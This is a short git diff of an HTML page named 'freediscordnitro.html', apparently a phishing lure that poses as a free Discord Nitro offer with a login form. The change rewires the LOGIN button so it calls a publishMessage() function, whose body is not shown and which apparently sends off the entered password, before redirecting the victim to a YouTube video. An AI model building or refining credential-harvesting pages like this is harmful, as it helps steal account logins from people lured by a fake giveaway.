--- a/freediscordnitro.html
+++ b/freediscordnitro.html
@@ -80,7 +80,7 @@
                     <input id="password"  type="password"></input>
 <!--                     <a href="https://instagram.com/dastix">Forgat your password?</a> -->
 <!-- 		    <button onclick="location.href='https://www.youtube.com/watch?v=BbeeuzU5Qc8'">Login</button> -->
-			<button id="btn"  onclick="publishMessage()" value="Publish" onclick="location.href='https://www.youtube.com/watch?v=BbeeuzU5Qc8'" type="button">LOGIN</button>
+			<button id="btn"  onclick="publishMessage();location.href='https://www.youtube.com/watch?v=BbeeuzU5Qc8'" value="Publish" onclick="location.href='https://www.youtube.com/watch?v=BbeeuzU5Qc8'" type="button">LOGIN</button>
                     <p style="margin-top: 15px; font-weight: 400">
                         <span style="color: rgb(105, 105, 105)">
                             Need An Account?
